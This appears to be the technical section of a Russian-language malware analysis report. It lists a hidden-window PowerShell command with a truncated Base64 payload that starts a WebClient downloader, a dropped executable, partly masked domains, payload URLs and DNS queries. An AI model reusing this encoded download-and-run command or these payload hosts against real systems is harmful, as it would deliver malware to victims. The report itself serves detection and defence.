Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAF8AMgBfADMAXwAxADYAPQAoACcAawBfAF8AJwArACcANQAwAF8AOAAnACkAOwAkAHoANQBfADEAXwAzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANQAyAF8AXwBfADQAPQAoACcAaAB0AH...
- %HOMEPATH%\84.exe
- %HOMEPATH%\84.exe
- 'ga######rutturelegno.com':80
- 'ga######rutturelegno.com':443
- 'mh##ent.com':80
- 'ex###shades.com':80
- 'ba#####etnamtoancau.com':80
- 'ba#####etnamtoancau.com':443
- http://ga######rutturelegno.com/pafgY1kbyB
- http://mh##ent.com/LM20Ymp
- http://ex###shades.com/CfK0g0aQ4r
- http://ba#####etnamtoancau.com/wp-admin/includes/uZ8bAUa52
- 'ga######rutturelegno.com':443
- 'ba#####etnamtoancau.com':443
- DNS ASK ga######rutturelegno.com
- DNS ASK mh##ent.com
- DNS ASK ex###shades.com
- DNS ASK ga#####aminerals.com
- DNS ASK ba#####etnamtoancau.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAF8AMgBfADMAXwAxADYAPQAoACcAawBfAF8AJwArACcANQAwAF8AOAAnACkAOwAkAHoANQBfADEAXwAzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANQAyAF8AXwBfADQAPQAoACcAaAB0AH...' (со скрытым окном)